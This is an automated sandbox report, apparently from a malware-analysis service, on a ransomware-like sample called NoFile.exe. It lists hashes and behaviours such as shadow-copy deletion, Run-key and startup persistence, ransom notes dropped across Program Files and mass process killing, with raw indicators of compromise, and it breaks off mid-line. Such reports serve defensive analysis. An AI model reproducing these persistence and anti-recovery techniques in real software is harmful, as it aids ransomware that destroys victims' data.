Analysis
-
max time kernel
151s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
06-02-2022 09:18
Static task
static1
Behavioral task
behavioral1
Sample
NoFile.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
NoFile.exe
Resource
win10v2004-en-20220112
General
-
Target
NoFile.exe
-
Size
2.2MB
-
MD5
7d1ed67b77f47ba8aadf9a3ac7d0c371
-
SHA1
a598e6708c189caeef1fa76064feb4d0155abb3d
-
SHA256
87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
-
SHA512
17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
NoFile.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe NoFile.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe NoFile.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
NoFile.exedescription ioc process File opened (read-only) \??\i: NoFile.exe File opened (read-only) \??\u: NoFile.exe File opened (read-only) \??\N: NoFile.exe File opened (read-only) \??\U: NoFile.exe File opened (read-only) \??\Z: NoFile.exe File opened (read-only) \??\f: NoFile.exe File opened (read-only) \??\q: NoFile.exe File opened (read-only) \??\x: NoFile.exe File opened (read-only) \??\G: NoFile.exe File opened (read-only) \??\I: NoFile.exe File opened (read-only) \??\L: NoFile.exe File opened (read-only) \??\h: NoFile.exe File opened (read-only) \??\w: NoFile.exe File opened (read-only) \??\y: NoFile.exe File opened (read-only) \??\A: NoFile.exe File opened (read-only) \??\F: NoFile.exe File opened (read-only) \??\M: NoFile.exe File opened (read-only) \??\r: NoFile.exe File opened (read-only) \??\Y: NoFile.exe File opened (read-only) \??\m: NoFile.exe File opened (read-only) \??\b: NoFile.exe File opened (read-only) \??\e: NoFile.exe File opened (read-only) \??\n: NoFile.exe File opened (read-only) \??\v: NoFile.exe File opened (read-only) \??\B: NoFile.exe File opened (read-only) \??\J: NoFile.exe File opened (read-only) \??\R: NoFile.exe File opened (read-only) \??\S: NoFile.exe File opened (read-only) \??\p: NoFile.exe File opened (read-only) \??\z: NoFile.exe File opened (read-only) \??\Q: NoFile.exe File opened (read-only) \??\T: NoFile.exe File opened (read-only) \??\W: NoFile.exe File opened (read-only) \??\l: NoFile.exe File opened (read-only) \??\o: NoFile.exe File opened (read-only) \??\k: NoFile.exe File opened (read-only) \??\g: NoFile.exe File opened (read-only) \??\E: NoFile.exe File opened (read-only) \??\O: NoFile.exe File opened (read-only) \??\P: NoFile.exe File opened (read-only) \??\a: NoFile.exe File opened (read-only) \??\j: NoFile.exe File opened (read-only) \??\t: NoFile.exe File opened (read-only) \??\s: NoFile.exe File opened (read-only) \??\H: NoFile.exe File opened (read-only) \??\K: NoFile.exe File opened (read-only) \??\V: NoFile.exe File opened (read-only) \??\X: NoFile.exe -
Drops file in Program Files directory 64 IoCs
Processes:
NoFile.exedescription ioc process File created \??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\microsoft shared\ink\sl-SI\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\microsoft shared\Source Engine\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\Ole DB\msdasql.dll NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\dtplugin\npdeployJava1.dll NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\eo.txt NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\gu.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\cpprestsdk.dll NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar NoFile.exe File created \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html NoFile.exe File opened for modification \??\c:\Program Files\Internet Explorer\fr-FR\iexplore.exe.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\jawt.dll NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll NoFile.exe File created \??\c:\Program Files\Common Files\microsoft shared\VGX\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\System\ado\de-DE\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\en-US\tipresx.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad.xml NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\instrument.dll NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\javafx_font.dll NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\id.txt NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\mk.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\uz.txt NoFile.exe File opened for modification \??\c:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sk.pak NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sk-sk.dll NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html NoFile.exe File created \??\c:\Program Files\Common Files\microsoft shared\VSTO\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\System\es-ES\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\System\Ole DB\de-DE\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\jvm.hprof.txt NoFile.exe File created \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\es.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\AppVOrchestration.dll NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\it-IT\TabTip.exe.mui NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui NoFile.exe File created \??\c:\Program Files\Common Files\System\ado\ja-JP\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui NoFile.exe File opened for modification \??\c:\Program Files\Google\Chrome\Application\89.0.4389.114\89.0.4389.114.manifest NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\descript.ion NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\fr-FR\TipRes.dll.mui NoFile.exe File created \??\c:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar NoFile.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\af.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp140.dll NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\it-IT\tipresx.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\jaas_nt.dll NoFile.exe File opened for modification \??\c:\Program Files\Common Files\microsoft shared\ink\cs-CZ\tipresx.dll.mui NoFile.exe -
Drops file in Windows directory 4 IoCs
Processes:
NoFile.exesvchost.exeTiWorker.exedescription ioc process File created C:\Windows\Pagesfilo.sys NoFile.exe File opened for modification C:\Windows\Pagesfilo.sys NoFile.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotifyIcon.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 10 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 228 timeout.exe 3084 timeout.exe 3144 timeout.exe 3468 timeout.exe 1508 timeout.exe 3388 timeout.exe 2868 timeout.exe 3500 timeout.exe 3780 timeout.exe 2984 timeout.exe -
Enumerates processes with tasklist 1 TTPs 11 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 3680 tasklist.exe 1356 tasklist.exe 1588 tasklist.exe 1932 tasklist.exe 1556 tasklist.exe 1748 tasklist.exe 2060 tasklist.exe 3912 tasklist.exe 3012 tasklist.exe 3532 tasklist.exe 2364 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 3324 systeminfo.exe 616 systeminfo.exe -
Kills process with taskkill 40 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2180 taskkill.exe 1668 taskkill.exe 3988 taskkill.exe 2708 taskkill.exe 1556 taskkill.exe 3584 taskkill.exe 2872 taskkill.exe 3588 taskkill.exe 2148 taskkill.exe 3004 taskkill.exe 312 taskkill.exe 1584 taskkill.exe 1748 taskkill.exe 796 taskkill.exe 2944 taskkill.exe 1580 taskkill.exe 2912 taskkill.exe 2080 taskkill.exe 2968 taskkill.exe 1260 taskkill.exe 3496 taskkill.exe 3008 taskkill.exe 3260 taskkill.exe 2572 taskkill.exe 2780 taskkill.exe 2064 taskkill.exe 3516 taskkill.exe 3388 taskkill.exe 1276 taskkill.exe 2784 taskkill.exe 3480 taskkill.exe 644 taskkill.exe 1184 taskkill.exe 1560 taskkill.exe 2760 taskkill.exe 3936 taskkill.exe 4068 taskkill.exe 3076 taskkill.exe 632 taskkill.exe 1136 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "6.818211" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3984" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132887891186226019" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4124" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config svchost.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
tasklist.exetasklist.exepid process 3012 tasklist.exe 3012 tasklist.exe 1556 tasklist.exe 1556 tasklist.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetasklist.exeTiWorker.exetasklist.exetasklist.exeWMIC.exevssvc.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3012 tasklist.exe Token: SeDebugPrivilege 1556 tasklist.exe Token: SeSecurityPrivilege 832 TiWorker.exe Token: SeRestorePrivilege 832 TiWorker.exe Token: SeBackupPrivilege 832 TiWorker.exe Token: SeDebugPrivilege 3532 tasklist.exe Token: SeDebugPrivilege 1748 tasklist.exe Token: SeIncreaseQuotaPrivilege 2172 WMIC.exe Token: SeSecurityPrivilege 2172 WMIC.exe Token: SeTakeOwnershipPrivilege 2172 WMIC.exe Token: SeLoadDriverPrivilege 2172 WMIC.exe Token: SeSystemProfilePrivilege 2172 WMIC.exe Token: SeSystemtimePrivilege 2172 WMIC.exe Token: SeProfSingleProcessPrivilege 2172 WMIC.exe Token: SeIncBasePriorityPrivilege 2172 WMIC.exe Token: SeCreatePagefilePrivilege 2172 WMIC.exe Token: SeBackupPrivilege 2172 WMIC.exe Token: SeRestorePrivilege 2172 WMIC.exe Token: SeShutdownPrivilege 2172 WMIC.exe Token: SeDebugPrivilege 2172 WMIC.exe Token: SeSystemEnvironmentPrivilege 2172 WMIC.exe Token: SeRemoteShutdownPrivilege 2172 WMIC.exe Token: SeUndockPrivilege 2172 WMIC.exe Token: SeManageVolumePrivilege 2172 WMIC.exe Token: 33 2172 WMIC.exe Token: 34 2172 WMIC.exe Token: 35 2172 WMIC.exe Token: 36 2172 WMIC.exe Token: SeIncreaseQuotaPrivilege 2172 WMIC.exe Token: SeSecurityPrivilege 2172 WMIC.exe Token: SeTakeOwnershipPrivilege 2172 WMIC.exe Token: SeLoadDriverPrivilege 2172 WMIC.exe Token: SeSystemProfilePrivilege 2172 WMIC.exe Token: SeSystemtimePrivilege 2172 WMIC.exe Token: SeProfSingleProcessPrivilege 2172 WMIC.exe Token: SeIncBasePriorityPrivilege 2172 WMIC.exe Token: SeCreatePagefilePrivilege 2172 WMIC.exe Token: SeBackupPrivilege 2172 WMIC.exe Token: SeRestorePrivilege 2172 WMIC.exe Token: SeShutdownPrivilege 2172 WMIC.exe Token: SeDebugPrivilege 2172 WMIC.exe Token: SeSystemEnvironmentPrivilege 2172 WMIC.exe Token: SeRemoteShutdownPrivilege 2172 WMIC.exe Token: SeUndockPrivilege 2172 WMIC.exe Token: SeManageVolumePrivilege 2172 WMIC.exe Token: 33 2172 WMIC.exe Token: 34 2172 WMIC.exe Token: 35 2172 WMIC.exe Token: 36 2172 WMIC.exe Token: SeBackupPrivilege 3896 vssvc.exe Token: SeRestorePrivilege 3896 vssvc.exe Token: SeAuditPrivilege 3896 vssvc.exe Token: SeDebugPrivilege 2060 tasklist.exe Token: SeDebugPrivilege 3680 tasklist.exe Token: SeDebugPrivilege 3496 taskkill.exe Token: SeDebugPrivilege 3076 taskkill.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 3516 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 644 taskkill.exe Token: SeDebugPrivilege 3004 taskkill.exe Token: SeDebugPrivilege 3260 taskkill.exe Token: SeDebugPrivilege 1748 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NoFile.execmd.execmd.execmd.execmd.exeWScript.execmd.execmd.execmd.exedescription pid process target process PID 3436 wrote to memory of 3064 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3064 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3064 3436 NoFile.exe cmd.exe PID 3064 wrote to memory of 3012 3064 cmd.exe tasklist.exe PID 3064 wrote to memory of 3012 3064 cmd.exe tasklist.exe PID 3064 wrote to memory of 3012 3064 cmd.exe tasklist.exe PID 3064 wrote to memory of 1952 3064 cmd.exe findstr.exe PID 3064 wrote to memory of 1952 3064 cmd.exe findstr.exe PID 3064 wrote to memory of 1952 3064 cmd.exe findstr.exe PID 3436 wrote to memory of 3484 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3484 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3484 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3444 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3444 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3444 3436 NoFile.exe cmd.exe PID 3444 wrote to memory of 3516 3444 cmd.exe WScript.exe PID 3444 wrote to memory of 3516 3444 cmd.exe WScript.exe PID 3444 wrote to memory of 3516 3444 cmd.exe WScript.exe PID 3436 wrote to memory of 3888 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3888 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3888 3436 NoFile.exe cmd.exe PID 3888 wrote to memory of 1276 3888 cmd.exe schtasks.exe PID 3888 wrote to memory of 1276 3888 cmd.exe schtasks.exe PID 3888 wrote to memory of 1276 3888 cmd.exe schtasks.exe PID 3436 wrote to memory of 536 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 536 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 536 3436 NoFile.exe cmd.exe PID 536 wrote to memory of 2868 536 cmd.exe nslookup.exe PID 536 wrote to memory of 2868 536 cmd.exe nslookup.exe PID 536 wrote to memory of 2868 536 cmd.exe nslookup.exe PID 3516 wrote to memory of 4052 3516 WScript.exe cmd.exe PID 3516 wrote to memory of 4052 3516 WScript.exe cmd.exe PID 3516 wrote to memory of 4052 3516 WScript.exe cmd.exe PID 3516 wrote to memory of 804 3516 WScript.exe cmd.exe PID 3516 wrote to memory of 804 3516 WScript.exe cmd.exe PID 3516 wrote to memory of 804 3516 WScript.exe cmd.exe PID 3436 wrote to memory of 3912 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3912 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 3912 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 2628 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 2628 3436 NoFile.exe cmd.exe PID 3436 wrote to memory of 2628 3436 NoFile.exe cmd.exe PID 2628 wrote to memory of 3324 2628 